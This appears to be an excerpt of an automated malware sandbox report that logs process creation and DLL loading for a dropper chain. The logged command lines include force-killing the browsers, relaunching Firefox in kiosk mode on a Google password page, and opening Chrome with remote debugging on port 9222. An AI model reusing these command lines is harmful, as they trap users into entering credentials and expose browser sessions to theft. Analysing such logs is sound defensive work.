Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe "C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe "C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe "C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe "C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe "C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe"
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe "C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2284 -parentBuildID 20230927232528 -prefsHandle 2228 -prefMapHandle 2220 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {860ecd33-e110-4052-ae68-4e078883f33a} 7072 "\\.\pipe\gecko-crash-server-pipe.7072" 234fd670d10 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3252 -parentBuildID 20230927232528 -prefsHandle 3424 -prefMapHandle 4020 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {50c83aef-67bf-4254-8691-55a698a37a6b} 7072 "\\.\pipe\gecko-crash-server-pipe.7072" 2348fa9a310 rdd
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe "C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2528 --field-trial-handle=2436,i,8770856731178862040,3094494008038900450,262144 /prefetch:8
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe "C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe"
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe "C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe"
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=2235d4f703.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1984,i,8577691366813222456,478156052820439559,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=2235d4f703.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2572 --field-trial-handle=2452,i,10496958904193057390,10329293642163972138,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=2235d4f703.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=2012,i,14918439842847781835,4316525183382803892,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=2235d4f703.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe "C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe"
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1492 --field-trial-handle=1964,i,2156908519176632186,6185840840257253882,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=2235d4f703.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe "C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe "C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe "C:\Users\user\AppData\Local\Temp\1008328001\86526d7b20.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe "C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe "C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008326001\2a8b7e5b78.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=2235d4f703.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=2235d4f703.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=2235d4f703.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2284 -parentBuildID 20230927232528 -prefsHandle 2228 -prefMapHandle 2220 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {860ecd33-e110-4052-ae68-4e078883f33a} 7072 "\\.\pipe\gecko-crash-server-pipe.7072" 234fd670d10 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3252 -parentBuildID 20230927232528 -prefsHandle 3424 -prefMapHandle 4020 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {50c83aef-67bf-4254-8691-55a698a37a6b} 7072 "\\.\pipe\gecko-crash-server-pipe.7072" 2348fa9a310 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=2235d4f703.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Users\user\AppData\Local\Temp\1008327001\2235d4f703.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=2235d4f703.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2528 --field-trial-handle=2436,i,8770856731178862040,3094494008038900450,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe "C:\Users\user\AppData\Local\Temp\1008330001\d0d78d3fdb.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1984,i,8577691366813222456,478156052820439559,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2572 --field-trial-handle=2452,i,10496958904193057390,10329293642163972138,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=2012,i,14918439842847781835,4316525183382803892,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1492 --field-trial-handle=1964,i,2156908519176632186,6185840840257253882,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1008329001\9afe8d29fa.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
